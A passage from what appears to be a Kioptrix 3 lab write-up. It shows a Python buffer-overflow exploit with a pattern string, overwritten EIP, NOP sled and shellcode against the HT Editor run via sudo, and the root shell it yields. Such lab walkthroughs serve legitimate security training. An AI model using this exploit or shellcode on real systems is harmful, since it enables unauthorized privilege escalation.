Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq"
# 4091 --> root@bt:/opt/metasploit/msf3/tools# ruby pattern_offset.rb 0x34674633
# 0x34674633 --> ht Editor overflow
bufferoverflow="\x41"*4091
eip="\xc5\xbe\x11\x08"
nops="\x90"*50
shellcode=("\x89\xe3\xda\xd4\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x62\x4a\x56\x6b\x62\x78\x5a\x39\x33\x62"
"\x63\x56\x32\x48\x76\x4d\x31\x73\x6c\x49\x59\x77\x32\x48"
"\x46\x4f\x34\x33\x51\x78\x75\x50\x32\x48\x36\x4f\x51\x72"
"\x35\x39\x32\x4e\x4c\x49\x68\x63\x31\x42\x38\x68\x56\x6a"
"\x55\x50\x53\x30\x73\x30\x54\x6f\x71\x72\x42\x49\x52\x4e"
"\x36\x4f\x45\x32\x50\x61\x63\x43\x32\x48\x67\x70\x43\x67"
"\x56\x33\x6d\x59\x58\x61\x7a\x6d\x6d\x50\x41\x41")
print (bufferoverflow+eip+nops+shellcode)
This exploit is really well written; we can even see how it was built. For the exploit itself, the first part, related to the pattern, is not needed. Now let's run it:
loneferret@Kioptrix3:~$ sudo ht $(python expl.py)
Normally the HT editor window appears, but glitched. We can then verify our root access:
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret#
We are root! But here again it is not ideal, as the shell looks garbled, as if line breaks were being mishandled...
display term on stderr
-s output TERM set command
-V print curses-version
-w set window-size
root@Kioptrix3:/home/loneferret# 8572.c CompanyPolicy.README LinEnum.sh checksec.sh echo expl expl.pl expl.py
root@Kioptrix3:/home/loneferret# TERM environment variable not set.
root@Kioptrix3:/home/loneferret# TERM environment variable not set.
Let's fix this:
root@Kioptrix3:/home/loneferret# reset
reset: unknown terminal type unknown
Terminal type? dumb
Our challenge is officially complete!